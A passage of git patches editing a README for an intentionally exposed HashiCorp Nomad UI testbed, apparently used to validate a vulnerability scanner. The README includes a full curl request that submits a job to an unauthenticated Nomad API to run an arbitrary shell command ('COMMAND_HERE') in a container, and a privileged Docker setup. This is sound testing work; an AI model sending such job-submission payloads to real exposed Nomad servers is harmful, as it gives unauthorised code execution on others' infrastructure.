OR to run Nomad on Ubuntu 24.04 with Docker run the following command: ## Warnings 1. The containers will run with `--privileged`. -2. the container doesn't run on the Apple Silicon +2. The container doesn't run correctly on Apple Silicon due to failure to get CPU usage when creating the job ```bash docker run --rm -it \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ From 4a22413941f1217b778f7ef98d4754db5e1c0190 Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:56:57 +0400 Subject: [PATCH 13/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 8d2ba38a..ad40a9f8 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -14,7 +14,7 @@ docker run --rm -it \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' ``` -# confirming the exposed ui +# Confirming the Exposed UI ```bash # replace the COMMAND_HERE with your command like `curl url` curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' From 8844a5f0c4c9205c8e7c186a0ef63c434befa3c5 Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:57:04 +0400 Subject: [PATCH 14/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index ad40a9f8..bcf9ceeb 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -23,7 +23,7 @@ curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' ``` -# setup an authenticated nomad ui (safe) +# Set Up an Authenticated Nomad UI (Safe) This version enables Nomad's ACL system, which requires a valid token for all API and UI access. ```bash docker run --rm -it \